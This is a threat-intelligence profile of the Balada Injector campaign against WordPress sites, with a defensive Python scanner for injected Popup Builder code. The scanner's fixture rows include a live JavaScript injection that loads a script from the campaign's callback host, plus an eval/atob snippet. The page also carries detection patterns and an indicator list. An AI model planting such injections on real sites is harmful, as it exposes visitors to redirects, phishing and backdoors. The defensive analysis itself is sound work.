Balada Injector
Balada Injector is malware/campaign activity associated with mass compromise of WordPress websites. The provided content states it has been detected on more than 1,170 sites by Sucuri SiteCheck, and another source cited in the content notes exploitation of the WordPress Popup Builder plugin vulnerability CVE-2023-6000 to infect more than 3,300 websites. The campaign is described as targeting WordPress sites through cross-site scripting (XSS) vulnerabilities, including a known XSS flaw in the Popup Builder plugin. In the cited November 2024 case, attackers injected JavaScript by manipulating a custom event during pop-up triggers; the injected script used the callback URL https://call[.]colorschemeas[.]com/2YYHm4, downloaded additional payloads, and ultimately installed a PHP-based backdoor. The content also references Darktrace detection of Balada Injector malware exploiting WordPress vulnerabilities to gain unauthorized network access. High-confidence indicators mentioned in the content include the callback URL call[.]colorschemeas[.]com/2YYHm4. Targeting described in the content includes WordPress-hosted websites, with one cited victim being a local government council website.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Sucuri's SiteCheck remote malware scanner has detected the Balada Injector malware on more than 1,170 sites. | WordPress websites were compromised by exploiting a vulnerability in older versions of the Popup Builder plugin, infecting more than 3,300 websites. The exploited vulnerability is tracked as CVE-2023-6000, a cross-site scripting (XSS) vulnerability affecting Popup Builder 4.2.3 and older. The attack infects sites through the Custom JavaScript or Custom CSS sections of the WordPress admin interface and stores the malicious code in the 'wp_postmeta' database table. The malicious code's main function is to act as an event handler for Popup Builder plugin events such as 'sgpb-ShouldOpen' and 'sgpb-ShouldClose'. The main goal of these attacks appears to be redirecting visitors of infected websites to malicious destinations, such as phishing pages and malware download sites.
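A defender-side check for the storage pattern described above, as an added example that is not part of this page or of Mallory: it scans wp_postmeta-style rows for Popup Builder event handlers that pull script from an external or known callback host, or that use obfuscation primitives. The sample rows are constructed, and the meta_key name is an assumption for illustration, not the plugin's real key.

```python
import re
from urllib.parse import urlparse

# Constructed sample rows in wp_postmeta shape: (meta_id, post_id, meta_key, meta_value).
# The meta_key "sg_popup_custom_js" is an assumed name, not Popup Builder's real key.
SAMPLE_ROWS = [
    (1, 10, "sg_popup_custom_js",
     "document.addEventListener('sgpb-ShouldOpen',function(e){"
     "var s=document.createElement('script');s.src='https://call.colorschemeas.com/2YYHm4';"
     "document.head.appendChild(s);});"),
    (2, 11, "sg_popup_custom_js",
     "document.addEventListener('sgpb-ShouldOpen',function(e){console.log('opened');});"),
    (3, 12, "sg_popup_custom_js",
     "document.addEventListener('sgpb-ShouldClose',function(e){eval(atob('YWxlcnQoMSk='));});"),
    (4, 13, "_edit_lock", "1700000000:1"),
]

EVENT_RE = re.compile(r"sgpb-Should(?:Open|Close)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
OBFUSCATION_RE = re.compile(r"\b(?:eval|atob|unescape|String\.fromCharCode)\s*\(", re.I)
# Callback host named in the reporting on this page (defanged there as call[.]colorschemeas[.]com).
KNOWN_BAD_HOSTS = {"call.colorschemeas.com"}

def scan_row(row, site_host, known_bad=KNOWN_BAD_HOSTS):
    """Return the reasons a wp_postmeta row looks like a Balada-style Popup Builder injection."""
    _meta_id, _post_id, _meta_key, value = row
    if not EVENT_RE.search(value):
        return []  # only handlers bound to the sgpb-* plugin events are in scope here
    reasons = []
    for url in URL_RE.findall(value):
        host = (urlparse(url).hostname or "").lower()
        if host in known_bad:
            reasons.append(f"known callback host {host}")
        elif host and host != site_host.lower():
            reasons.append(f"script loaded from external host {host}")
    if OBFUSCATION_RE.search(value):
        reasons.append("obfuscation primitive inside event handler")
    return reasons

def scan_postmeta(rows, site_host):
    """Map meta_id -> reasons for every row that trips at least one check."""
    findings = {}
    for row in rows:
        reasons = scan_row(row, site_host)
        if reasons:
            findings[row[0]] = reasons
    return findings
```

On a real site the rows would come from a `SELECT meta_id, post_id, meta_key, meta_value FROM wp_postmeta` export, and the site's own hostname is passed as `site_host` so first-party script URLs are not flagged.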
IOCs tracked for this family
2 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
Recent activity
3 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A web-injection campaign targeting WordPress sites (via XSS in plugins) to inject obfuscated JavaScript that calls out to attacker infrastructure to fetch additional payloads and ultimately install a PHP-based backdoor for persistent access.
Malware reported to exploit WordPress vulnerabilities to gain unauthorized (initial) access to networks.
Balada Injector is a malware family that injects malicious code into WordPress sites, often via plugin vulnerabilities, to redirect visitors to phishing or malware sites.